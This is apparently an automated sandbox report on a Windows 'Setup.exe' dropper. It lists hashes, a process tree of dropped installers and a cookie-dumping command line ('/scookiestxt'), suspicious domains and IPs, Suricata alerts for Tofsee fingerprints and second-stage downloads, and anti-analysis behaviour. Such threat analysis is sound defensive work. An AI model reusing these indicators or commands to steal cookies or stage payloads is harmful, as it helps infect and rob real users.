Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 23, 2021, 10:27 a.m.	May 23, 2021, 10:30 a.m.

Size	6.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`d69ad8d2f432e57d4f5ecf5d7e7f9300`
SHA256	`21415b4bd92f908e375ef73e62b8539724488e9372c6df980d91c01e47ebfd15`
CRC32	`DBB4CD53`
ssdeep	`196608:it8ocoSzMfJbTIiDOVcYtdkk+HiS8pamD:zoSiJbTIiDOVcYtdNs8J`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

Setup.exe "C:\Users\test22\AppData\Local\Temp\Setup.exe"
3324
- hjjgaa.exe "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
  3172
  - jfiag3g_gg.exe C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
    3724
  - jfiag3g_gg.exe C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
    8908
- RunWW.exe "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
  7232
- BarSetpFile.exe "C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe"
  4372
  - 5931879.exe "C:\Users\test22\AppData\Roaming\5931879.exe"
    560
- guihuali-game.exe "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
  8956
  - rundll32.exe "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\test22\AppData\Local\Temp\install.dll",install
    1892
- LabPicV3.exe "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
  7072
  - LabPicV3.tmp "C:\Users\test22\AppData\Local\Temp\is-HLUV2.tmp\LabPicV3.tmp" /SL5="$5603FE,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
    7664
    - 3316505.exe "C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\3316505.exe" /S /UID=lab214
      2736
      - prolab.exe "C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe" /VERYSILENT
        6876
        
        prolab.tmp "C:\Users\test22\AppData\Local\Temp\is-G0C0S.tmp\prolab.tmp" /SL5="$27036A,575243,216576,C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe" /VERYSILENT
        2720
      - Nehaetaepiwae.exe "C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe"
        5424
      - Syruzhulyso.exe "C:\Users\test22\AppData\Local\Temp\89-c69b5-0b0-9d9b4-f8e2a18de3e26\Syruzhulyso.exe"
        8836
- lylal220.exe "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
  4980
  - lylal220.tmp "C:\Users\test22\AppData\Local\Temp\is-OI7OR.tmp\lylal220.tmp" /SL5="$8602BC,237286,153600,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
    4368
    - 4_177039.exe "C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\4_177039.exe" /S /UID=lylal220
      7804
      - irecord.exe "C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe" /VERYSILENT
        6556
        
        irecord.tmp "C:\Users\test22\AppData\Local\Temp\is-SF1FM.tmp\irecord.tmp" /SL5="$3601A8,6139911,56832,C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe" /VERYSILENT
        5956
        
        i-record.exe "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
        4808
      - Soricurijae.exe "C:\Users\test22\AppData\Local\Temp\53-2a4df-783-e8e83-ece411c6b8600\Soricurijae.exe"
        7836
      - Naesurygoqa.exe "C:\Users\test22\AppData\Local\Temp\35-ee468-37b-64bb7-869fa1b301d69\Naesurygoqa.exe"
        4436
- Versium.exe "C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe" /Verysilent
  7940
  - Versium.tmp "C:\Users\test22\AppData\Local\Temp\is-T3D23.tmp\Versium.tmp" /SL5="$790248,138429,56832,C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe" /Verysilent
    6744
    - Setup.exe "C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe" /Verysilent
      3468
      - AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        1912
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
connectini.net	A 162.0.210.44	162.0.210.44
news-systems.xyz	A 172.67.145.48 A 104.21.33.129	104.21.33.129
iplogger.org	A 88.99.66.31	88.99.66.31
global-sc-ltd.com	A 199.188.201.83	199.188.201.83
email.yg9.me		198.13.62.186
google.com	A 216.58.197.206	172.217.25.78
www.facebook.com	A 157.240.215.35 CNAME star-mini.c10r.facebook.com	157.240.215.35
ol.gamegame.info	A 104.21.21.221 A 172.67.200.215	104.21.21.221
ipinfo.io	A 34.117.59.81	34.117.59.81
www.google.com	A 216.58.197.196	216.58.197.228
b92d17fa-9c17-4007-a5f7-b87033b86cc2.s3.us-east-2.amazonaws.com	CNAME s3-r-w.us-east-2.amazonaws.com A 52.219.84.224	52.219.106.138
c.pycharm3.ru	A 217.107.34.191	217.107.34.191
uyg5wye.2ihsfa.com	A 88.218.92.148	88.218.92.148
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	172.67.75.172
ipqualityscore.com	A 104.26.2.60 A 172.67.72.12 A 104.26.3.60	104.26.2.60
iw.gamegame.info	A 172.67.200.215 A 104.21.21.221	104.21.21.221
email.yg9.me	A 198.13.62.186	198.13.62.186
limesfile.com	A 198.54.126.101	198.54.126.101
ip-api.com	A 208.95.112.1	208.95.112.1
reportyuwt4sbackv97qarke3.com	A 162.0.220.187	162.0.220.187

IP Address	Status	Action
104.21.21.221	Active	Moloch
104.21.33.129	Active	Moloch
104.26.13.31	Active	Moloch
104.26.3.60	Active	Moloch
157.240.215.35	Active	Moloch
162.0.210.44	Active	Moloch
162.0.220.187	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
172.67.200.215	Active	Moloch
198.13.62.186	Active	Moloch
198.54.126.101	Active	Moloch
199.188.201.83	Active	Moloch
208.95.112.1	Active	Moloch
216.58.197.196	Active	Moloch
216.58.197.206	Active	Moloch
217.107.34.191	Active	Moloch
34.117.59.81	Active	Moloch
52.219.84.224	Active	Moloch
87.251.71.193	Active	Moloch
88.218.92.148	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49815 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49827 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49827 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49827	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49831 -> 157.240.215.35:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.188.201.83:80 -> 192.168.56.102:49822	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49838 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49838 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49838 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49838 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49838 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 199.188.201.83:80 -> 192.168.56.102:49826	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49844 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49848 -> 104.21.33.129:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49845 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.102:61999 -> 198.13.62.186:53	2014702	ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Opcode 8 through 15 set	Potential Corporate Privacy Violation
TCP 192.168.56.102:49856 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49825 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49825 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49834 -> 104.26.3.60:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 52.219.84.224:80 -> 192.168.56.102:49837	2013414	ET POLICY Executable served from Amazon S3	Potentially Bad Traffic
TCP 52.219.84.224:80 -> 192.168.56.102:49837	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49825 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49843 -> 217.107.34.191:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.188.201.83:80 -> 192.168.56.102:49861	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 199.188.201.83:80 -> 192.168.56.102:49861	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.102:49865 -> 104.26.13.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49869 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 198.54.126.101:80 -> 192.168.56.102:49871	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.54.126.101:80 -> 192.168.56.102:49871	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.102:49902 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49877 -> 104.21.33.129:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.188.201.83:80 -> 192.168.56.102:49852	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 199.188.201.83:80 -> 192.168.56.102:49852	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.54.126.101:80 -> 192.168.56.102:49854	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.54.126.101:80 -> 192.168.56.102:49854	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.54.126.101:80 -> 192.168.56.102:49854	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.54.126.101:80 -> 192.168.56.102:49884	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.54.126.101:80 -> 192.168.56.102:49884	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.102:49914 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49941 -> 104.21.33.129:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.251.71.193:80 -> 192.168.56.102:49862	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 198.54.126.101:80 -> 192.168.56.102:49909	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.54.126.101:80 -> 192.168.56.102:49909	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.54.126.101:80 -> 192.168.56.102:49854	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49827 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7
TLSv1 192.168.56.102:49831 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com	8a:d5:51:89:8f:00:98:8e:5b:0f:b8:07:6d:0d:43:18:89:c2:bb:d0
TLSv1 192.168.56.102:49844 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.102:49848 104.21.33.129:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	b9:aa:e0:5f:19:30:9d:ab:13:f8:91:a8:6e:d1:a1:cd:ce:c9:08:46
TLSv1 192.168.56.102:49845 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.102:49856 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.102:49834 104.26.3.60:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	f5:72:da:40:bf:be:27:7c:72:0c:5c:e2:dd:f4:22:7a:4d:b1:41:14
TLS 1.2 192.168.56.102:49843 217.107.34.191:443	C=US, O=Let's Encrypt, CN=R3	CN=*.c.pycharm3.ru	bc:49:7e:fa:ec:b5:83:bd:e1:27:45:05:73:ba:9a:f7:37:8e:2c:5f
TLSv1 192.168.56.102:49865 104.26.13.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e
TLSv1 192.168.56.102:49869 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.102:49902 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.102:49877 104.21.33.129:443	None	None	None
TLSv1 192.168.56.102:49914 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.102:49941 104.21.33.129:443	None	None	None

Queries for the computername (28 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 23, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:22 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 23, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (20 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:20 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:20 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:20 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:20 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:27 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:28 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:28 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:28 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:21 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:21 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:28 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:29 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:29 a.m.			0	0
IsDebuggerPresent May 23, 2021, 10:29 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (7 events)

Time & API	Arguments	Status	Return
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00825758 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00825758 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00825798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05db8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05db8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05db7fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2021, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0045d4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2021, 10:27 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (50 out of 65540 events)

Time & API	Arguments	Status
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 